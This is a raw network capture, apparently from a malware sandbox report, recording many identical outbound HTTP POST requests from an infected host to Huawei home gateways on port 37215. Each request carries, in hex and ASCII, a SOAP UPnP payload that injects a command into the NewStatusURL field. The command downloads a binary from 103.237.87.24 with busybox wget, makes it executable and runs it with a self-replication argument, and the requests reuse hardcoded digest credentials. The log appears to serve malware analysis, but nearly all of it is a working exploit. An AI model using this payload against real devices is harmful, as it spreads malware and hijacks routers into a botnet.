                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2403192.168.2.133300441.204.27.7637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625297070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2404192.168.2.133400641.51.193.11437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625305891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2405192.168.2.133560841.239.56.17337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625317097 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2406192.168.2.1356582197.87.133.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625586033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2407192.168.2.1344154197.211.181.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625586033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2408192.168.2.135655041.12.20.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625602961 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2409192.168.2.1337386197.24.169.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625607014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2410192.168.2.1360158197.83.44.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625611067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2411192.168.2.134377041.148.43.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625629902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2412192.168.2.1359502197.155.199.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625629902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
